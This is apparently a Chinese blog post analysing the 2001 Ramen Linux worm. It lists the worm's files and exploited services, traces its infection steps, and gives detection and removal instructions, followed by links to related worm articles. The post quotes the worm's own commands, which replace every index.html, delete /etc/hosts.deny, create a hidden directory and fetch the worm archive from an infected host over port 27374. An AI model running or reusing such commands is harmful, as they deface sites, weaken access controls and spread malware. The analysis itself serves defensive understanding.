RAMEN 蠕虫介绍

原创 2001年02月01日 13:27:00

RAMEN 蠕虫介绍
t0pgun
admin@supernj.com

  Ramen是一个利用redhat的现有远程漏洞自动传播的蠕虫.此蠕虫由多个攻击性exploit和自动执行脚本组成,专门针对redhat 6.2和redhat 7.0存在的rpc.statd远程溢出,wu-ftpd,lpd格式化字符串漏洞来进行入侵.此蠕虫已经感染了上千台linux系统.如果在此蠕虫中再加上DDoS的插件.那么危害性将很严重

此蠕虫中包含有这些文件
asp:    一个redhat7下面的xinetd配置文件,监听端口27374
asp62:  一个简单的httpd服务守护进程.当链接此服务时,它会提供此蠕虫的压缩包,此蠕虫主要靠此服务传播(for RedHat 6.2)
asp7:   一个简单的httpd服务守护进程.当链接此服务时,它会提供此蠕虫的压缩包,此蠕虫主要靠此服务传播(for RedHat 7.0)
bd62.sh:  蠕虫的安装程序 for RedHat 6.2
bd7.sh:  蠕虫的安装程序 for RedHat 7.0
getip.sh: 获得主机ip的脚本.
hackl.sh: 读取.l文件.并且把地址写入lh.sh
hackw.sh: 读取.w文件.并且把地址写入wh.sh
index.html: HTML 文本.蠕虫用此文本替换主机的首页
l62:    修改过的LPRng 的格式化字符串攻击程序 for RedHat 6.2
l7:    修改过的LPRng 的格式化字符串攻击程序 for RedHat 7.0
lh.sh:   执行LPRng exploit的脚本
randb62:  随机产生一个B类的ip地址 for RedHat 6.2
randb7:  随机产生一个B类的ip地址 for RedHat 7.0
s62:    修改过的statdx的exploit for RedHat 6.2
s7:    修改过的statdx的exploit for RedHat 7
scan.sh:  从randb程序中取得一个B类的网络地址.然后运行synscan
start.sh: 此蠕虫的开始程序
start62.sh: 后台开始运行 scan.sh, hackl.sh, hackw.sh脚本
start7.sh: 和start62.sh同样功能
synscan62: 修改过的synscan for RedHat 6.2
synscan7:  修改过的synscan for RedHat 7
w62:    修改过的wu-ftpd 2.6的expolit for RedHat 6.2
w7:     修改过的wu-ftpd 2.6的expolit for RedHat 7.0
wh.sh:   运行exploit的脚本
wu62:    修改过的wu-ftp 2.6的exploit

它的感染过程是这样的:
入侵者先攻击进入一台redhat6.2或者7.0,上传此蠕虫,运行start.sh脚本,感染第一台redhat.
start.sh 首先查找 主机的web主页面,并且用自己的页面替换它
nohup find / -name "index.html" -exec /bin/cp index.html {} /; &
然后删除hosts.deny文件
rm -f /etc/hosts.deny
接着运行getip.sh取这台主机的ip地址
简单判断此系统是redhat6.2还是7.0
安装相应的服务文件,开始工作.Ramen worm扫描随机产生的地址范围,根据取回的ftp banner和端口信息来判断Redhat系统.进行相应的入侵.

当Ramen进入另外一个系统后,会在系统上做如下动作:
首先在/usr/src/ 建立隐藏目录 .poop/
mkdir /usr/src/.poop;cd /usr/src/.poop
接着通过lynx这个文本浏览器来取得已经中了Ramen的机器上的蠕虫文件.
lynx -source http://%s:27374 > /usr/src/.poop/ramen.tgz
解开此压缩包,并且复制一份到/tmp目录下
运行start.sh 感染系统.并且发一份mail到gb31337@hotmail.com和gb31337@yahoo.com.通知此蠕虫的主人.

如何发现您的系统已经被蠕虫感染?
此蠕虫会消耗大量系统资源来运行syn扫描
通过查看系统进程和当前链接情况可以看出当前正在运行的程序
ps -ef | more
netstat -a
如果发现大量的syn半连接和可疑的syn扫描进程.那么立刻停止这些进程.检查系统
首先查看系统服务 :
连接系统的27374 端口.如果得到大量的乱码信息.那么可能被感染
检查
/etc/inetd.conf (redhat6.2);/etc/xinetd.d/ (redhat7)
grep -v '#' /etc/inetd.conf | grep asp
ls -la /etc/xinetd.d/ | grep asp
cat /etc/rc.d/rc.sysinit | grep '/usr/src/.poop'
如果发现此服务,而且此服务以前并不存在.那么有可能被蠕虫感染.
检查 /usr/src/.poop/目录和/tmp目录.看是否存在上述脚本程序
再检查/var/log/secure和/var/log/messages文件.这些文件里可以看出是否被蠕虫攻击过.并且可以记录下攻击的来源.
你还可以检查/var/log/maillog 看是否有发往 gb31337@hotmail.com和gb31337@yahoo.com 的mail

如何杀掉此蠕虫?
首先把系统与网络断开
编辑 /etc/rc.d/rc.sysinit 文件,删除/usr/src/.poop/start*.sh 这一行
编辑 /etc/inetd.conf 删除asp stream tcp nowait root /sbin/asp (6.2)
   /etc/xinetd.d/ 删除asp (7.0)
删除 /sbin/asp 文件
此时此蠕虫的启动部分已经删除

删除/usr/src/.poop/目录和/tmp下的ramen.tgz文件

由于此蠕虫删除了/usr/sbin/rpc.rstatd,/sbin/rpc.statd和/usr/sbin/lpd程序.并且禁止了ftp的匿名登陆
如果需要的话.你应该回复这些文件.
重新启动系统.看一下进程和服务,是否已经正常.如果正常那么就开始安装系统补丁.

 

渗透测试笔记:爬虫变蠕虫的故事

写这篇文,主要想以日记的形式记录下我在整个测试(gongji)过程中的 心路历程、所用技术、填的坑等等。。 为了让文章显得不那么呆板,不那么流水,我尽量使用一些文艺点的词汇。 9月份的广州,一天...
  • qq_30123355
  • qq_30123355
  • 2016年09月07日 20:04
  • 1443

防范勒索蠕虫病毒入侵,3分钟教你快速关闭高危端口445!

“永恒之蓝”的外衣是多么的美妙,“勒索蠕虫病毒”的内在是多么的丑陋!...
  • Summer_Hanson
  • Summer_Hanson
  • 2017年05月16日 10:47
  • 1235

病毒、木马、蠕虫与恶意代码关键点

病毒:寄生存在,所谓寄生,就是病毒的指令存在于其它可执行程序的空指令部分。如下图为一个标准的计寄生形式的病毒: 运行可执行程序,一个jmp指令会导致程序跳转到病毒所在指令处开始执行,执行完毕之后...
  • Apollon_krj
  • Apollon_krj
  • 2017年07月12日 19:50
  • 2057

病毒、蠕虫与木马之间有什么区别?

随着互联网的日益流行,各种病毒木马也猖厥起来,几乎每天都有新的病毒产生,大肆传播破坏,给广大互联网用户造成了极大的危害,几乎到了令人谈毒色变的地步。各种病毒,蠕虫,木马纷至沓来,令人防不胜防,苦恼无比...
  • zhangnn5
  • zhangnn5
  • 2011年09月04日 22:22
  • 824

“飞客蠕虫”形成全球最大僵尸网络 每日感染数万网民

近期,为祸两年的“飞客蠕虫”病毒再次爆发,瑞星“云安全”系统显示,这种被称为MS08-067病毒(又名“飞客蠕虫”)的黑客程序正在在国内互联网上迅速扩散,每天感染数万网民。目前,我国用户感染量全球居首...
  • cometwo
  • cometwo
  • 2012年10月12日 15:51
  • 1695

新型“蠕虫”勒索软件“wannacry”全球爆发态势及防火墙方式关闭445端口应对措施

北京时间2017年5月12日20时左右,全球爆发大规模勒索软件感染事件,目前的防御措施是关闭本机445端口。...
  • gongxifacai_believe
  • gongxifacai_believe
  • 2017年05月13日 17:48
  • 1288

蠕虫病毒疯狂肆虐 数据中心当如何防范?

如今,WannaCry和Petya等蠕虫病毒在全球各地肆虐表明,企业通过更新系统补丁的方式已经远远不能保护其数据中心。 自从计算机时代到来,蠕虫病毒就已经存在。它们是一种没有任何人工干预即可传播...
  • qq_41068411
  • qq_41068411
  • 2017年11月15日 16:49
  • 32

Cisco交换机解决网络蠕虫病毒入侵问题

Cisco交换机解决网络蠕虫病毒入侵问题          今年来网络蠕虫泛滥给ISP和企业都造成了巨大损失,截至目前已发现近百万种病毒及木马。受感染的网络基础设施遭到破坏,以Sql Slammer...
  • lcgweb
  • lcgweb
  • 2014年05月19日 19:09
  • 396

用Nmap工具查找Downadup/Conficker的蠕虫病毒源

1、 Downadup/Conficker Conficker主要利用Windows操作系统MS08-067漏洞来传播,同时也能借助任何有USB接口的硬件设备来感染,在2008年被发现,并在微软的M...
  • u012810862
  • u012810862
  • 2013年12月03日 15:30
  • 850

洛谷 P1815 蠕虫游戏 _NOI导刊2011提高(02)

洛谷 P1815 蠕虫游戏 _NOI导刊2011提高(02)题目题目描述蠕虫是一个古老的电脑游戏,它有许多版本。但所有版本都有一个共同的规则:操纵一条蠕虫在屏幕上转圈,并试着去避免撞到自己或障碍物。 ...
  • faojie
  • faojie
  • 2017年07月24日 13:18
  • 172
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:RAMEN 蠕虫介绍
举报原因:
原因补充:

(最多只允许输入30个字)